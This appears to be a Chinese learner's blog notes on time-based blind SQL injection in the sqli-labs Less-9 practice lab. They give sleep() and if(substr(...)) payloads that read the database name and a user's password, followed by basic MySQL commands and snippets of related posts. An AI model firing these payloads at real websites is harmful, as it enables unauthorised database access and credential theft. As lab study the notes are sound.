時間盲注和布林盲注很相似,不同的是時間注入是利用sleep()和benchmark()等函式使時間變長
最基礎的理論:
if(expr1,expr2,expr3),含義為:如果expr1為真,則執行expr2,為假則執行expr3
實驗環境:sqli-labs-less9
不管怎麼輸都是you are in…考慮時間盲注
?id=
1' and sleep(3
)--+
很明顯有延時
開始if語句
二分法求database()長度,不再演示
?id=
1' and if(substr(database(),1,1)='s',
sleep(3
),1)
--+
再求出資料庫名security,可用substr函式或left函式
爆表
?id=
這裡我就直接寫結果了
因為我知道有username和password,所有乙個乙個試,在第4列和12列的得到了結果。
?id=
1' and if(left((select password from users order by id limit 0,1),4)='dumb',
sleep(3
),1)
--+
這裡用dump試了一下,成功,手工注入實在受不了,寫指令碼或者拿sqlmap跑
參考大佬的筆記
sql盲注
sql盲注指令碼模板
sqli-labs6-10 盲注、基於時間,基於報錯(附指令碼)
show databases; 檢視資料庫
use dvwa;進入資料庫
select database(); 檢視當前資料庫
desc users; 檢視表列表
show tables;檢視庫中的表
select * from users;檢視表
增刪改查:
增:insert into 表名稱(列1,列2…) values (值1,值2…)
刪:delect from 表名稱 where 列名稱 = 值
改:update 表名稱 set 列名稱 = 新值 where 列名稱 = 某值
查:select * from 表名稱 select 列名稱 from 表名稱
我也不是十分了解資料庫,就這樣吧,明天繼續。幹了!奧力給!
萌新學習手冊 surf特徵檢測
演算法原理 includeusing namespace xfeatures2d 嗯,在開頭要包含這個庫然後申明命名空間 src imread c users pbiha desktop image 1.png imread grayscale imread grayscale就是0,表示讀入一張灰...
SQL注入基礎 3 報錯注入
1 考慮使用報錯注入 url url 由於多了乙個 sql語句執行時會報錯。而這裡程式直接將錯誤資訊輸出到了頁面上,所以可以利用報錯注入來獲取資料。2 獲取user 的值 報錯注入有多種格式,這裡使用updatexml 函式,其中0x7e為ascii編碼,解碼為 語句 and updatexml 1...
SQL注入詳解 3
第三節 判斷資料庫型別及注入方法 不同的資料庫的函式 注入方法都是有差異的,所以在注入之前,我們還要判斷一下資料庫的型別。一般asp 最常搭配的資料庫是access 和sqlserver 網上超過99 的 都是其中之一。怎麼讓程式告訴你它使用的什麼資料庫呢?來看看 sqlserver 有一些系統變數...